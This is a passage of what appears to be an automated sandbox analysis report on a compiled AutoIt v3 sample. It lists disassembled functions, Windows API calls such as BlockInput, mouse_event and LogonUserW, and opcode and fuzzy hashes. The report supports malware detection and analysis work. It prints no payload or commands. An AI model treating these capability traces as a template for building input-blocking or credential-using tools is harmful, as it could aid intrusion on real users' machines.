              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 0a08f3243979922e0a85d901944a9b7942ff39f635b211bd6c6d9b918b77e2f6
              • Instruction ID: 1e849dedb2cec3d093f2b344996ec583731547fc675c7de5ec46b0299d43b5f1
              • Opcode Fuzzy Hash: 0a08f3243979922e0a85d901944a9b7942ff39f635b211bd6c6d9b918b77e2f6
              • Instruction Fuzzy Hash: 4BB09231098348ABCA902B91FD0DB883F68EB45AB2F4040A0FE0D84862CB6254508A91
              Function 001AF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f79ecd011805419015b0b921613339890b5eb43ac3b19892550b30026da69a0
              • Instruction ID: 0709bb828e82a7e8217020bdbf90c1fe62998fbaaab78ef0622197d25b1acede
              • Opcode Fuzzy Hash: 6f79ecd011805419015b0b921613339890b5eb43ac3b19892550b30026da69a0
              • Instruction Fuzzy Hash: AC322526D69F014DD7239634E836336A259AFB73D8F15D73BF81AB59A6EF28C5830100
              Function 001B267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 63885197a0039cfb8ed727331ae89e39becca0183403dd3076bec99e7f359b3f
              • Instruction ID: 6cc1619c83976ede0373d56362730061a96b848392aa3974cc1c99f3615855d2
              • Opcode Fuzzy Hash: 63885197a0039cfb8ed727331ae89e39becca0183403dd3076bec99e7f359b3f
              • Instruction Fuzzy Hash: 0FB1F020E2AF514DD32396399835336FA4CAFBB2D5F52D71BFC2674D22EB2185834141
              Function 001F41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
              Download Yara Rule
              APIs
              • BlockInput.USER32(00000001), ref: 001F4218
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BlockInput
              • String ID:
              • API String ID: 3456056419-0
              • Opcode ID: 219820a6ec2de7410bdfffb4e0ede0458787b5b96308d7f7186c361c65bb5c9e
              • Instruction ID: 9a5d8076b6d59b378adda5e934608e643c81bd0e90034d7a397c5900e3044ef3
              • Opcode Fuzzy Hash: 219820a6ec2de7410bdfffb4e0ede0458787b5b96308d7f7186c361c65bb5c9e
              • Instruction Fuzzy Hash: 36E048352402145FC710EF59E844A6BF7DCAFA4760F058025FD49C7352DB71E940CB90
              Function 001E4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001E4EEC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: mouse_event
              • String ID:
              • API String ID: 2434400541-0
              • Opcode ID: 829e113b8df54c080c6b7ef524a32d0f68957dafdba681fc088aebf31b7c6e04
              • Instruction ID: 41407db641db5c433f0d5e515391722d1760b1befccb1c87199f5151e52a8662
              • Opcode Fuzzy Hash: 829e113b8df54c080c6b7ef524a32d0f68957dafdba681fc088aebf31b7c6e04
              • Instruction Fuzzy Hash: 84D05E98160F843BEC7C4B279C5FF7F0208F300781FD1414AB142894C2DAD86C505030
              Function 001D8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
              Download Yara Rule
              APIs
              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001D88D1), ref: 001D8CB3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LogonUser
              • String ID:
              • API String ID: 1244722697-0
              • Opcode ID: 4ba39ed57d0c6377bd1e7e0fea6e78bdc880acb7803ef2fd5511ff43b675cec5
              • Instruction ID: a5771608728d8af3b7a04a11a6841d7eade82cd19f8e158114275e4da68c5c5c
              • Opcode Fuzzy Hash: 4ba39ed57d0c6377bd1e7e0fea6e78bdc880acb7803ef2fd5511ff43b675cec5
              • Instruction Fuzzy Hash: E4D05E322A060EABEF018EA4ED05EAF3B6AEB04B01F408111FE15C50A1C775D835AB60
              Function 001C2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
              Download Yara Rule
              APIs
              • GetUserNameW.ADVAPI32(?,?), ref: 001C2242
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: 6ad3adbc6b923bb6d75dc112d5027966503e9cd566732bb7aa7e674b324f00a1
              • Instruction ID: 2817d1d376bf508e5e4d55edb20d13e975079f2627816c17930b3e5ba506fee4
              • Opcode Fuzzy Hash: 6ad3adbc6b923bb6d75dc112d5027966503e9cd566732bb7aa7e674b324f00a1
              • Instruction Fuzzy Hash: 68C04CF1C40209DBDB15DB90DA88EEE77BCAB04305F104055A101F2101D7749B448E71
              Function 001AA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 001AA36A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 163e3cd1dcffd89569df6d52e55534e31fc32f497d8dda8a1e09e43c307ec38d
              • Instruction ID: 37f4a234871d6a48fa4b757e112c5fa47bcd1a87ebf335bcb87b2144b9575782
              • Opcode Fuzzy Hash: 163e3cd1dcffd89569df6d52e55534e31fc32f497d8dda8a1e09e43c307ec38d
              • Instruction Fuzzy Hash: A6A0113008820CABCA002B82FC08888BFACEA002A0B0080A0FC0C808228B32A8208A80
              Function 00198A0E Relevance: .6, Instructions: 608COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 25a8bd5f75c23284f44707c11caef5bb433f87629a662d57f3b9195c760907f9
              • Instruction ID: b91ac22949b76e3aaf936ee4d3bf6ad92e6353f6a939ca68ccacc54ec9dca9f4
              • Opcode Fuzzy Hash: 25a8bd5f75c23284f44707c11caef5bb433f87629a662d57f3b9195c760907f9
              • Instruction Fuzzy Hash: A1220370A05616CBDF388F28C4946BDB7A2FB03344F69886BD8429B791DB34DD81DB61
              Function 001A2405 Relevance: .3, Instructions: 345COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 68c6559c4a5a2bcbc8d6b498efe2b76def4c8a433f3ba7b7f50c3477afaf4f97
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: 97C1823A2051A309DF6D863D943413EBAE16EA37B171A075DE8B3CB5C5EF20D568E620
              Function 001A283A Relevance: .3, Instructions: 341COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: d36184d0adba20972da0072465a3f4869a0bb458e934b9a72aaecddf7c956db5
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: 1DC1913A2051A30ADF6D463E943403EBBE15AA37B171A076DE4B2DB5D5EF30D528E620
              Function 001F7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
              Download Yara Rule
              APIs
              • DeleteObject.GDI32(00000000), ref: 001F7B70
              • DeleteObject.GDI32(00000000), ref: 001F7B82
              • DestroyWindow.USER32 ref: 001F7B90
              • GetDesktopWindow.USER32 ref: 001F7BAA
              • GetWindowRect.USER32(00000000), ref: 001F7BB1
              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001F7CF2
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001F7D02
              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7D4A
              • GetClientRect.USER32(00000000,?), ref: 001F7D56
              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001F7D90
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DB2
              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DC5
              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DD0
              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DD9
              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DE8
              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DF1
              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7DF8
              • GlobalFree.KERNEL32(00000000), ref: 001F7E03
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7E15
              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00212CAC,00000000), ref: 001F7E2B
              • GlobalFree.KERNEL32(00000000), ref: 001F7E3B
              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 001F7E61
              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 001F7E80
              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F7EA2
              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001F808F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
              • String ID: $AutoIt v3$DISPLAY$static
              • API String ID: 2211948467-2373415609
              • Opcode ID: 4b0c0304de547b93f9452f5b9ee56b75b6ea18e2379d39a9d153853d434cd7f4
              • Instruction ID: f143b83e06e586e7b06772bd69f7603209c43e88d3e023a4eb9ea5cd67382973
              • Opcode Fuzzy Hash: 4b0c0304de547b93f9452f5b9ee56b75b6ea18e2379d39a9d153853d434cd7f4
              • Instruction Fuzzy Hash: EF027B75900209AFDB14DF64DD8DEBEBBB9EB49310F148158F915AB2A1CB71AD01CB60
              Function 002037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?,0020F910), ref: 002038AF
              • IsWindowVisible.USER32(?), ref: 002038D3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharUpperVisibleWindow
              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
              • API String ID: 4105515805-45149045
              • Opcode ID: 553fe3f4071cc919d0b35e92dffe420452c1b6c629ca6044496062fc1c4581e2
              • Instruction ID: 70cbf7fd352b6fdf6a44fe015eadda462d19b41bdb8cfa1824856909d41d9f1b
              • Opcode Fuzzy Hash: 553fe3f4071cc919d0b35e92dffe420452c1b6c629ca6044496062fc1c4581e2
              • Instruction Fuzzy Hash: 3FD1C374224306CBCB15EF50C491A6E77A9AFA8354F144459F8869B3E3CB71EE1ACB81
              Function 0020A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
              Download Yara Rule
              APIs
              • SetTextColor.GDI32(?,00000000), ref: 0020A89F
              • GetSysColorBrush.USER32(0000000F), ref: 0020A8D0
              • GetSysColor.USER32(0000000F), ref: 0020A8DC
              • SetBkColor.GDI32(?,000000FF), ref: 0020A8F6
              • SelectObject.GDI32(?,?), ref: 0020A905
              • InflateRect.USER32(?,000000FF,000000FF), ref: 0020A930
              • GetSysColor.USER32(00000010), ref: 0020A938
              • CreateSolidBrush.GDI32(00000000), ref: 0020A93F
              • FrameRect.USER32(?,?,00000000), ref: 0020A94E
              • DeleteObject.GDI32(00000000), ref: 0020A955
              • InflateRect.USER32(?,000000FE,000000FE), ref: 0020A9A0
              • FillRect.USER32(?,?,?), ref: 0020A9D2
              • GetWindowLongW.USER32(?,000000F0), ref: 0020A9FD
                • Part of subcall function 0020AB60: GetSysColor.USER32(00000012), ref: 0020AB99
                • Part of subcall function 0020AB60: SetTextColor.GDI32(?,?), ref: 0020AB9D
                • Part of subcall function 0020AB60: GetSysColorBrush.USER32(0000000F), ref: 0020ABB3
                • Part of subcall function 0020AB60: GetSysColor.USER32(0000000F), ref: 0020ABBE
                • Part of subcall function 0020AB60: GetSysColor.USER32(00000011), ref: 0020ABDB
                • Part of subcall function 0020AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0020ABE9
                • Part of subcall function 0020AB60: SelectObject.GDI32(?,00000000), ref: 0020ABFA
                • Part of subcall function 0020AB60: SetBkColor.GDI32(?,00000000), ref: 0020AC03
                • Part of subcall function 0020AB60: SelectObject.GDI32(?,?), ref: 0020AC10
                • Part of subcall function 0020AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0020AC2F
                • Part of subcall function 0020AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0020AC46
                • Part of subcall function 0020AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0020AC5B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
              • String ID:
              • API String ID: 4124339563-0
              • Opcode ID: 0e8b095b029b10bba5873b05673a1436ee394aa08f774dcf958d862ac9718542
              • Instruction ID: 7fe658091adcd281baf80862e190800a0a4b39ae387d60d933acc8560db73a5f
              • Opcode Fuzzy Hash: 0e8b095b029b10bba5873b05673a1436ee394aa08f774dcf958d862ac9718542
              • Instruction Fuzzy Hash: E4A1BC72118301AFD7609F64ED0CA6BBBA9FF89320F504A29F962961E2D770D844CB52
              Function 00182C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(?,?,?), ref: 00182CA2
              • DeleteObject.GDI32(00000000), ref: 00182CE8
              • DeleteObject.GDI32(00000000), ref: 00182CF3
              • DestroyIcon.USER32(00000000,?,?,?), ref: 00182CFE
              • DestroyWindow.USER32(00000000,?,?,?), ref: 00182D09
              • SendMessageW.USER32(?,00001308,?,00000000), ref: 001BC68B
              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001BC6C4
              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001BCAED
                • Part of subcall function 00181B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00182036,?,00000000,?,?,?,?,001816CB,00000000,?), ref: 00181B9A
              • SendMessageW.USER32(?,00001053), ref: 001BCB2A
              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001BCB41
              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001BCB57
              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 001BCB62
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
              • String ID: 0
              • API String ID: 464785882-4108050209
              • Opcode ID: a9c0d4f5700b75f5920cc847bd629a68017fb16b6b13c2db487b6d74abcab03e
              • Instruction ID: bd335d90ce6d0f5af414bdc8d49fb3a1cef3628e31da50025b380f8ebe50f1e8
              • Opcode Fuzzy Hash: a9c0d4f5700b75f5920cc847bd629a68017fb16b6b13c2db487b6d74abcab03e
              • Instruction Fuzzy Hash: A812AC30604201EFDB25DF24C988BA9BBE5BF45300F544569F89ADB662CB31ED42CFA1
              Function 001F77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(00000000), ref: 001F77F1
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001F78B0
              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001F78EE
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001F7900
              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 001F7946
              • GetClientRect.USER32(00000000,?), ref: 001F7952
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 001F7996
              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001F79A5
              • GetStockObject.GDI32(00000011), ref: 001F79B5
              • SelectObject.GDI32(00000000,00000000), ref: 001F79B9
              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001F79C9
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001F79D2
              • DeleteDC.GDI32(00000000), ref: 001F79DB
              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001F7A07
              • SendMessageW.USER32(00000030,00000000,00000001), ref: 001F7A1E
              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 001F7A59
              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001F7A6D
              • SendMessageW.USER32(00000404,00000001,00000000), ref: 001F7A7E
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 001F7AAE
              • GetStockObject.GDI32(00000011), ref: 001F7AB9
              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001F7AC4
              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001F7ACE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
